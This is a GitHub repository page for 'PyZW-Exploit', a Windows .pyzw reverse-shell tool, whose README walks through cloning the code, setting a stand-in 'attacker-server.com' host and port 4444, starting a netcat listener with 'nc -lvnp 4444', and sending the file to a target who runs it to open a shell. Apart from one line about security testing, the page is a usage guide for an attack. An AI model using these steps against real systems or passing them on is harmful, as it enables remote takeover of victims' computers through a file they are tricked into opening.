Skip to content

hackintoanetwork/PyZW-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 

Repository files navigation

1. Clone the Code

First, clone the PyZW Exploit code from GitHub using the following command:

git clone https://github.com/hackintoanetwork/pyzw-exploit

2. Replace Host, Port

Replace the server address and port address in the exploit.pyzw file with attacker server address.

    HOST = "attacker-server.com" # change here 
    PORT = 4444 # change here

3. Open Reverse Shell

The Attacker needs to prepare a reverse shell on their server. Use the following command to open the reverse shell:

nc -lvnp 4444

4. Send Exploit and Wait

Send the modified exploit.pyzw file to the target system. Wait for the target to execute the file.

5. Verify Connection

When the target executes the exploit.pyzw file, it will automatically connect to the reverse shell on your configured server. This provides the researcher with access to the target system for security testing.

About

Windows .pyzw Reverse Shell

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published